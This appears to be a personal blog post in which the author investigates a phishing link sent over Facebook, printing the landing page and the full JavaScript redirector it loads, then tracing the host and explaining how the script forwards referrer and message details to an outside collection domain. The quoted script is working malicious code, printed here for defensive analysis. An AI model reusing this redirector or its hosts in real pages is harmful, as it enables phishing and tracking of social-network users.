Phishing on Facebook
I was peacefully watching videos on Hulu when I received a mysterious email from one of my friends on Facebook. The message contents contained something that the individual would probably never say to me and was followed by a link. I immediately knew that this might be a part of some phishing scam. Knowing that others who were also sent the message might not realize the danger, I immediately told everyone not to click the link.
Now that the chance of others being taken advantage by this scam was greatly reduced, I could begin my investigation as to what sort of information the phishers were gathering. I fired up a terminal and went to work.
$ curl http://198.64.140.97/funnymovie/
nzmkuewnjpew hvsigccd <script src="3jsum37jmq1z.js"></script> uvqztdlft egjykgmuvrrzzmr
Well that seemed odd. I didn’t understand the random characters, but the script tag made it completely obvious that they were up to no good. Well, lets see what it does.$ curl http://198.64.140.97/funnymovie/3jsum37jmq1z.js
// KROTEG
var abc1 = 'http://r-d-cgpay-090709.com/go/'; // 1
var abc2 = 'http://r-d-cgpay-090709.com/go/';
var ss = '' + location.search; // 2
if ((location.search).length>0) abc = abc1; else abc = abc2;
var redirects = [
['facebook.com', abc+'fb.php'],
['tagged.com', abc+'tg.php'],
['friendster.com',abc+'fr.php'],
['myspace.com', abc+'ms.php'],
['msplinks.com', abc+'ms.php'],
['myyearbook.com',abc+'yb.php'],
['fubar.com', abc+'fu.php'],
['twitter.com', abc+'tw.php'],
['hi5.com', abc+'hi5.php'],
['bebo.com', abc+'be.php']
]; // 3
var s = '' + document.referrer, r = false;
for (var i = 0; i < redirects.length; i ++) {
if ((s.indexOf(redirects[i][0]) != -1)) { // 4
var redir=redirects[i][1] + location.search;
if ((location.search).length>0)
redir=redir+'&amp;amp;amp;domain='+
location.host; else redir=redir+'?domain='+
location.host;
location.href = redir; //5
r = true;
break;
}
}
if (!r) location.href = abc+'index.php'+ location.search;
This find was definitely interesting. Let’s go step by step and figure out what they are doing.
First I wanted to know about the site behind all of this http://r-d-cgpay-090709.com. Their IP address and approximate location could be determined by a simple traceroute.
$ traceroute r-d-cgpay-090709.com
traceroute to r-d-cgpay-090709.com (61.235.117.71) 1 192.168.1.1 (192.168.1.1) 9.331 ms 1.834 ms 2.213 ms 2 * * * 3 te-3-4-ur04.santaclara.ca.sfba.comcast.net 4 be-70-ar01.oakland.ca.sfba.comcast.net 5 pos-0-6-0-0-cr01.sacramento.ca.ibone.comcast.net 6 pos-0-9-0-0-cr01.sanjose.ca.ibone.comcast.net 7 pos-0-0-0-0-pe01.11greatoaks.ca.ibone.comcast.net 8 tenge13-3.br02.sjo01.pccwbtn.net 9 china-tietong.pos6-2.cr02.hkg04.pccwbtn.net 10 61.237.119.81 11 61.237.112.74 12 222.50.127.218 13 61.235.116.130 14 61.235.117.71
It appeared as if this IP address was from somewhere in China according to the line containing “china-tietong”. I was then curious if they had a pattern of dubious behavior. I entered their IP address into Google. According to the search results, McAfee identifies this IP as malicious as it has been responsible for malware in the past. Now that I knew who I was dealing with, it was time to figure out what type of information they were getting from people. I will talk about lines that I have commented in the code.
- This is the URL that they are using to capture the incoming information.
- In Javascript, location.search is the string from the URL query section (everything after and including the ?). So in the case of Facebook, it would appear to be something like this: ?t=XXXXXXXXXXXXX&mbox_pos=Y (where X is the message ID).
- This part of the code creates a url in the form of http://r-d-cgpay-090709.com/go/fb.php where the final page differs by each service the user originates from.
- The for loop in this part searches through the redirect array for the corresponding originating site. Once it has found the site it creates a url in the form: http://r-d-cgpay-090709.com/go/fb.php?t=XXXXXXXXXXXXX&mbox_pos=Y&domain=facebook.com
- The browser is sent to this url so that the attackers can gain information about the user that clicked on the link. The site does not send a reply back when visiting this url.
However, this information they are collecting does not seem very interesting. They were able to obtain the message that the url was posted on along with the originating site. Maybe it could be a stepping stone for a larger attack? Could they be gathering information about which social network sites are most vulnerable to a phishing attack? Did I simply miss something? Any insightful comments on this potential attack are welcomed!
